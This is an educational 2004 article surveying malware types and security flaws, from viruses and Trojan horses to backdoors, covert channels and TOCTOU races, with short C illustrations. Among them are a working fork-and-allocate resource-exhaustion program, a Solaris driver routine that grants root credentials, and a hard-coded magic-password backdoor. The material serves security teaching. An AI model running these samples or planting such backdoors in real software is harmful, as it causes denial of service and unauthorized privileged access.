kernelthread.com

A Taste of Computer Security

© Amit Singh. All Rights Reserved. Written in June 2004


Security Uprooting Vehicles

Misbehaving programs, including those that seem to have a life of their own, have long been part of computing. Any system is only as secure as its weakest point, and every system built so far has had several.

Digital Life

Some pioneers of computing were working on creating "digital life" long before computer viruses and worms existed, whether in the minds of science fiction writers or in "real" life. John von Neumann conceived cellular automata — dynamical systems with discrete space, time, and state — in the late 1940s. Von Neumann believed that logic was the eventual basis of life, and that it must therefore be possible to support life through a construct that supports logic. A very popular cellular automaton is Life (often called the Game of Life). Invented in 1970 by John H. Conway, Life is a universal cellular automaton — it can effectively emulate any other cellular automaton.

Although von Neumann used discrete models for self-reproduction, he intended to develop a continuous model later.
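To make the notion of a cellular automaton concrete, the following is a minimal sketch of Life in C, on an arbitrary 8x8 grid with everything outside the grid treated as dead: a live cell survives if it has two or three live neighbors, and a dead cell comes alive if it has exactly three live neighbors.

/*
 * One generation of Conway's Life on a small, fixed-size grid; cells
 * outside the grid are treated as dead.  A live cell survives with two
 * or three live neighbors; a dead cell comes alive with exactly three.
 */
#include <stdio.h>
#include <string.h>

#define ROWS 8
#define COLS 8

static void
step(char cur[ROWS][COLS], char next[ROWS][COLS])
{
    int r, c, dr, dc;

    for (r = 0; r < ROWS; r++) {
        for (c = 0; c < COLS; c++) {
            int live = 0;

            /* Count the live cells among the eight neighbors. */
            for (dr = -1; dr <= 1; dr++) {
                for (dc = -1; dc <= 1; dc++) {
                    int nr = r + dr, nc = c + dc;
                    if ((dr || dc) && nr >= 0 && nr < ROWS &&
                        nc >= 0 && nc < COLS)
                        live += cur[nr][nc];
                }
            }

            next[r][c] = cur[r][c] ? (live == 2 || live == 3) : (live == 3);
        }
    }
}

int
main(void)
{
    char grid[ROWS][COLS] = { { 0 } }, next[ROWS][COLS];
    int gen, r, c;

    /* A "blinker": three live cells in a row oscillate with period two. */
    grid[3][2] = grid[3][3] = grid[3][4] = 1;

    for (gen = 0; gen < 4; gen++) {
        for (r = 0; r < ROWS; r++) {
            for (c = 0; c < COLS; c++)
                putchar(grid[r][c] ? '*' : '.');
            putchar('\n');
        }
        putchar('\n');
        step(grid, next);
        memcpy(grid, next, sizeof(grid));
    }
    return 0;
}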

Let us briefly consider general (not strict) definitions of some common types of digital life. In the next sections, we will look at worms and viruses in greater detail.

Viruses

Viruses have become an accepted, if highly disruptive and expensive to deal with, part of mainstream computing. It is common to see corporate computers deployed with virus hotline stickers.

Viruses are pieces of software that can attach themselves to executable files, disk boot sectors, or documents whose loading is likely to cause execution of embedded code at some point; a virus may additionally hide elsewhere in the operating system, including the kernel. These "infected" entities become carriers of the virus's malicious code and thereby allow it to self-replicate.

Another way to look at this is that viruses can exist for any runtime environment: the one providing a platform's primary application binary interface (ABI), a macro language, some other interpreter, and so on.

Worms

Like a virus, a worm self-replicates, but usually over a network. Worms usually infiltrate computers by exploiting holes in the security of networked systems.

By their nature, worms usually attack programs that are already running. The attack might result in the creation of new processes, after which the worm can run independently and self-propagate. Unlike a virus, a worm may not change existing programs, but like a virus, a worm may carry some "payload" code, which in turn may modify existing programs or system configuration.

Bacteria

A not-so-distinct category of digital creatures, mentioned only rarely in the literature, is bacteria. These are programs that replicate themselves and feed off the host system by consuming resources such as processor time and memory.
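A contrived, hypothetical sketch of such a program in C follows; it should be obvious why one would not want to run it outside a disposable environment.

/*
 * A hypothetical "bacterium": it does no useful work, only reproduces,
 * consuming process-table slots, CPU time, and memory until resource
 * limits (or the administrator) stop it.
 */
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

int
main(void)
{
    for (;;) {
        fork();                         /* every copy keeps reproducing  */
        char *p = malloc(1 << 20);      /* ... and grabbing memory       */
        if (p != NULL)
            memset(p, 1, 1 << 20);      /* touch it so it is really used */
    }
}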

Trojan Horses

Like the Greek Trojan horse, these programs have a hidden, negative, subversive, and thus potentially harmful aspect. Trojan horses are programs that masquerade as useful programs, but contain malicious code to attack the system or leak information. An unsuspecting user would typically run a Trojan horse willingly, to use its supposed (advertised) features.

A Trojan horse is sometimes called a Trojan mule. However, doing so taints the allusion.

Ken Thompson talked about a compiler Trojan horse in his 1983 Turing Award lecture, Reflections on Trusting Trust. Consider the following quote from the lecture:

"The actual bug I planted in the compiler would match code in the UNIX "login" command. The replacement code would miscompile the login command so that it would accept either the intended encrypted password or a particular known password. Thus if this code were installed in binary and the binary were used to compile the login command, I could log into that system as any user.

Thompson also suggested the additional step of removing this "bug" from the source of the C compiler, by adding a second Trojan horse aimed at the C compiler itself.

It is important to realize that the categories listed above, and the ones that follow, often overlap — sometimes even greatly so. In any case, although such categorization is helpful in explanation, and might be entertaining otherwise, it is not extremely useful in itself.

Some Other Manifestations and Causes of Insecurity

Some other classifications of malicious programs and mechanisms are listed below:

Logic Bombs

A logic bomb is a program that does something, usually malicious (it "explodes"), when some logical condition is satisfied. If the condition is time-related, such programs could also be termed time bombs. Consider a contrived example of a logic bomb.
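The sketch below is hypothetical; the trigger date and the deliberately harmless payload are purely illustrative.

/*
 * A hypothetical time bomb: the program does its normal work until a
 * hard-coded date, after which the hidden payload fires.
 */
#include <stdio.h>
#include <time.h>

static void
payload(void)
{
    /* A real logic bomb might delete files or corrupt data. */
    printf("*** logic bomb triggered ***\n");
}

int
main(void)
{
    time_t now = time(NULL);
    struct tm *t = localtime(&now);

    if (t->tm_year + 1900 >= 2005)      /* on or after January 1, 2005 */
        payload();
    else
        printf("doing normal, useful work\n");

    return 0;
}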

Backdoors

A backdoor opens a system for access by an external entity by subverting, or bypassing, the local security policies. The goal of a backdoor is usually to allow remote access and control (over a network), although it may also work "locally". Backdoors are sometimes referred to as trapdoors.

Backdoors may exist for various reasons: a developer might leave one in as a debugging or maintenance aid and forget (or decline) to remove it, or an attacker might implant one on a compromised system in order to retain access to it.

Consider some specific, somewhat contrived, examples of backdoors:

/* Solaris */
static int
foo_open(dev_t *dev, int openflags, int otyp, cred_t *foo)
{
    int retval = 0;

    /* use ddi_get_soft_state or something */

    /* The backdoor: rewrite the caller's credentials to those of root. */
    foo->cr_uid  = 0;
    foo->cr_gid  = 0;
    foo->cr_ruid = 0;
    foo->cr_rgid = 0;
    foo->cr_suid = 0;
    foo->cr_sgid = 0;

    return retval;
}
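As another contrived, hypothetical example, consider a password check that quietly accepts a hard-coded "magic" value in addition to the legitimate password, which is essentially what Thompson's miscompiled login would have done. The function name and the value below are illustrative.

/*
 * A hypothetical application-level backdoor: besides the legitimate
 * password, the check also accepts a hard-coded value known only to
 * whoever planted it.
 */
#include <string.h>

#define MAGIC_PASSWORD "s3same"

int
check_password(const char *supplied, const char *expected)
{
    if (strcmp(supplied, expected) == 0)
        return 1;                       /* legitimate match           */

    if (strcmp(supplied, MAGIC_PASSWORD) == 0)
        return 1;                       /* backdoor: always let it in */

    return 0;
}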

Gaining enough privileges (if required) on a system to be able to implant a backdoor is an orthogonal issue.

Spyware

Spyware is ostensibly useful software that transmits private user data to an external entity, without the user's consent or even knowledge. The external entity stands to gain from the information thus harvested; a common example is using it to send targeted advertising to the user.

Spyware constitutes malware because it makes unauthorized use of a system's resources and leaks information (that is, violates privacy). In certain cases, spyware may enter a system not through an apparently useful program, but as payload of another malicious program, such as a worm or a virus.

Covert Channel

Sometimes, an information channel might be used to transfer certain information, possibly malicious, in a way that was not intended by the system's designers. Such a covert channel can be an effective mechanism to help in subversive activities.

As an example, consider this implementation of Towers of Hanoi. The solution uses the ICMP echo/response mechanism (ping) to solve the puzzle. You ping the "Hanoi machine", and you get response packets whose sequence numbers represent the disk moves needed to solve the puzzle.
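As a simpler, and equally contrived, local sketch, consider two processes that are not supposed to exchange data: the sender below leaks one bit per second purely through the existence of an agreed-upon file, which a receiver can poll with stat or access. The file name and the timing are, of course, arbitrary.

/*
 * A contrived covert storage channel: one bit per time slot is encoded
 * in whether an agreed-upon file exists.  Nothing is ever written to
 * the file itself.
 */
#include <fcntl.h>
#include <unistd.h>

#define CHANNEL_FILE "/tmp/.covert_flag"    /* illustrative rendezvous */
#define SLOT_SECONDS 1                      /* one bit per second      */

static void
send_bit(int bit)
{
    if (bit) {
        int fd = open(CHANNEL_FILE, O_CREAT | O_WRONLY, 0644);
        if (fd >= 0)
            close(fd);
    } else {
        unlink(CHANNEL_FILE);
    }
    sleep(SLOT_SECONDS);
}

int
main(void)
{
    unsigned char secret = 'A';             /* the byte being leaked   */
    int i;

    /* Transmit the byte one bit at a time, most significant bit first. */
    for (i = 7; i >= 0; i--)
        send_bit((secret >> i) & 1);

    unlink(CHANNEL_FILE);
    return 0;
}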

Race Conditions

Race conditions are flaws, either in design or implementation, that involve an attacker exploiting a window of time in a sequence of (privileged) non-atomic operations. The window exists when a program checks for a condition and subsequently uses the result of the check, with the two steps not being atomic. Such flaws are also called time-of-check-to-time-of-use (TOCTOU) flaws.
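A minimal, hypothetical sketch of the pattern in a setuid-root program follows: access checks what the real user may read, open later uses the file with the program's full privileges, and in between an attacker can swap the file for a symbolic link to something sensitive.

/*
 * A hypothetical TOCTOU flaw in a setuid-root program: between the
 * access() check and the open(), an attacker can replace the named
 * file with a symbolic link to a file the real user may not read.
 */
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>

int
main(int argc, char *argv[])
{
    int fd;

    if (argc != 2) {
        fprintf(stderr, "usage: %s file\n", argv[0]);
        return 1;
    }

    /* Time of check: may the real (non-root) user read this file? */
    if (access(argv[1], R_OK) != 0) {
        perror("access");
        return 1;
    }

    /* ... the window: argv[1] can be re-pointed right here ... */

    /* Time of use: the open happens with the program's root privileges. */
    fd = open(argv[1], O_RDONLY);
    if (fd < 0) {
        perror("open");
        return 1;
    }

    /* read and process the file, then clean up */
    close(fd);
    return 0;
}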

Consider a historical example. In some early versions of UNIX, mkdir was a setuid program owned by root. Creating a directory required a mknod system call to allocate storage for the new directory, which would initially be owned by root. In a second step, the chown system call changed the owner of the newly created directory from root to the appropriate user. Since this sequence was not atomic, an attacker could remove the directory before the chown and replace it with a link to a sensitive file (the password file, for example); the chown would then change the linked file's ownership instead.

The following excerpt is from the source of the mkdir command in UNIX V7 (note the explicit calls to link to create '.' and '..'):

mkdir(d)
char *d;
{
    char pname[128], dname[128];
    register i, slash = 0;

    pname[0] = '\0';
    for(i = 0; d[i]; ++i)
        if(d[i] == '/')
            slash = i + 1;
    if(slash)
        strncpy(pname, d, slash);
    strcpy(pname+slash, ".");
    if (access(pname, 02)) {
        fprintf(stderr, "mkdir: cannot access %s\n", pname);
        ++Errors;
        return;
    }
    if ((mknod(d, 040777, 0)) < 0) {
        fprintf(stderr, "mkdir: cannot make directory %s\n", d);
        ++Errors;
        return;
    }
    chown(d, getuid(), getgid());
    strcpy(dname, d);
    strcat(dname, "/.");
    if ((link(d, dname)) < 0) {
        fprintf(stderr, "mkdir: cannot link %s\n", dname);
        unlink(d);
        ++Errors;
        return;
    }
    strcat(dname, ".");
    if ((link(pname, dname)) < 0) {
        fprintf(stderr, "mkdir: cannot link %s\n", dname);
        dname[strlen(dname)] = '\0';
        unlink(dname);
        unlink(d);
        ++Errors;
    }
}

Address Space Attacks

The most widely attacked resource in stored-program computing is memory. We will look at some common address-space attacks in Defeating Memory.

Waste Searching

"Waste Searching" (or dumpster-diving), that is, looking for sensitive information in areas that are traditionally unprotected, or weakly protected, is a popular and effective security-thwarting approach. Attackers have been known to scavenge printer ribbons, tapes, disk drives, floppy diskettes, garbage paper, and so on. A system's swap space is another potentially lucrative area to look at for sensitive information. Some of these holes could be reasonably plugged through operational (best-practices) means, such as administrative shredding/destruction. Others, such as protecting the swap space, are harder, needing discipline and support from various quarters (programs should proactively ensure that sensitive memory is not swapped out, encrypted swap space could be used, etc.).

File Vault on Mac OS X

There was much hue and cry about File Vault (encrypted disk image) passwords being readable in the swap files on Mac OS X. While you need super-user access to read a swap file, this was considered a serious flaw by many who were counting on nobody, not even the super-user, to be able to access their encrypted home directories. Such a requirement is legitimate, and would be especially relevant if the computer were stolen.

However, the issue is not limited to securing an encrypted filesystem password. An authenticated application that reads data from an encrypted filesystem could be swapped out, and such data could appear as plaintext in the swap space. There is plenty of other sensitive information that could be salvaged from a swap file, possibly including parts of files that you "securely deleted." This could happen even after the system has shut down, and the swap files have been deleted.

In the case of File Vault, some blamed the programmer for failing to ensure that such "critical memory" was not swapped out. However, one could not possibly prevent all content residing on the encrypted filesystem from being swapped out. The problem would be better solved by an implementation of encrypted swap space, or a robust password mechanism on the disk drive itself.

Note that the problem described herein exists on most operating systems. You can find an implementation of encrypted swap space on OpenBSD, but in general, it is a rarity.

Design Flaws, Oversights, and "This is just how things are"

Sometimes, a system or a protocol may have flaws that show up only later, long after it is deployed. This could be because the designers simply "missed it", but it could also be because the designers never expected their creation to be used so widely, or used in a context where the flaw would "matter". The TCP SYN flood, a widely used denial-of-service attack, is due to a design property of the TCP protocol itself: the receiving host must commit state for each half-open connection during the three-way handshake, and an attacker can create such connections without ever completing them.

Depending upon how widespread the deployment is, and how disruptive the solution is, such flaws may be extremely hard to address.

Another example is the sendmail program's -C option, which allowed a user to specify the configuration file to be used. If the file had syntax errors (say, because it was not even a configuration file), sendmail displayed the offending lines. Thus, sendmail could be used to view sensitive information. Another sendmail oversight, the DEBUG command, was one of the vulnerabilities exploited by the Morris Worm, which we shall encounter in a later section.

Finally, social engineering, the practice of strategically convincing people to divulge sensitive information, is perhaps the most dangerous (and surprisingly easy to accomplish) way to defeat security.
